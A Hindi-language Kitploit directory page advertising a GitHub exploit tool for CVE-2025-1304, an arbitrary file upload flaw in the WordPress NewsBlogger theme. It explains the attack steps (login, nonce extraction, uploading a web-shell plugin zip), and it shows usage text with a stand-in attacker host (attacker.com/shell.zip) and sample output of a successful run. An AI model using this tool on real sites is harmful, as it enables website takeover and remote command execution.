Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-1304 — WordPress NewsBlogger थीम <= 0.2.5.1 में मनमाना फ़ाइल अपलोड भेद्यता मौजूद है। | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-1304
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2025-1304

CVE-2025-1304

WordPress NewsBlogger थीम <= 0.2.5.1 में मनमाना फ़ाइल अपलोड भेद्यता मौजूद है।

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 WordPress NewsBlogger थीम <= 0.2.5.1 - मनमाना फ़ाइल अपलोड (CVE-2025-1304)

CVSS स्कोर: 8.8 (उच्च)
भेद्यता प्रकार: मनमाना फ़ाइल अपलोड
घटक: WordPress थीम
CVE ID: CVE-2025-1304


🔥 भेद्यता अवलोकन

NewsBlogger WordPress थीम (संस्करण <= 0.2.5.1) एडमिन वेलकम पैनल के माध्यम से मनमाना फ़ाइल अपलोड की भेद्यता से ग्रस्त है।

यह भेद्यता किसी भी प्रमाणित उपयोगकर्ता को — न्यूनतम सब्सक्राइबर भूमिका वाले उपयोगकर्ताओं सहित — वेब शेल युक्त दुर्भावनापूर्ण .zip संग्रह अपलोड करने की अनुमति देती है।
अपलोड एक अमान्य प्लगइन URL फ़ील्ड के माध्यम से होता है, जो अपलोड की गई फ़ाइल की सामग्री या प्रकार को ठीक से सत्यापित करने में विफल रहता है।

एक सफल हमला वेबसाइट के पूर्ण समझौते का कारण बन सकता है, जिसमें दूरस्थ कमांड निष्पादन और विशेषाधिकार वृद्धि शामिल है।


🧠 स्क्रिप्ट विवरण

यह Python स्क्रिप्ट निम्नलिखित तरीकों से भेद्यता के शोषण को स्वचालित करती है:

  • प्रदान किए गए एडमिन क्रेडेंशियल का उपयोग करके लॉगिन करना।
  • भेद्य वेलकम पेज से nonce को गतिशील रूप से निकालना।
  • भेद्य AJAX एंडपॉइंट के माध्यम से दूरस्थ दुर्भावनापूर्ण प्लगइन अपलोड करना।

⚙️ उपयोग निर्देश

root@kitploit:~
python CVE-2025-1304.py -h
root@kitploit:~
usage: a.py [-h] --url URL --username USERNAME --password PASSWORD --shellweb SHELLWEB

WordPress NewsBlogger Theme vulnerable to Arbitrary File Upload #By: Nxploited ( Khaled Alenazi )

options:
  -h, --help                show this help message and exit
  --url, -u URL             Target base URL (e.g., http://target/wordpress)
  --username, -un USERNAME WordPress admin username
  --password, -p PASSWORD   WordPress admin password
  --shellweb, -shell SHELLWEB
                           Direct URL to the malicious shell zip (e.g., http://attacker.com/shell.zip)

📤 उदाहरण आउटपुट

root@kitploit:~
[+] Logging in to http://target/wordpress/wp-login.php
[+] Logged in successfully.
[+] Fetching welcome page to extract nonce: http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome
[+] Extracted nonce: 012818100b
[+] Sending malicious plugin URL to: http://target/wordpress/wp-admin/admin-ajax.php
[+] Server response:
{"success":true,"data":{"redirect_url":"http://target/wordpress/wp-admin/admin.php?page=newsblogger-welcome"}}

⚠️ अस्वीकरण

यह कोड केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
लेखक इस उपकरण के किसी भी दुरुपयोग या क्षति के लिए कोई ज़िम्मेदारी नहीं लेता है।


द्वारा: Nxploited ( Khaled Alenazi )

टूल डाउनलोड करें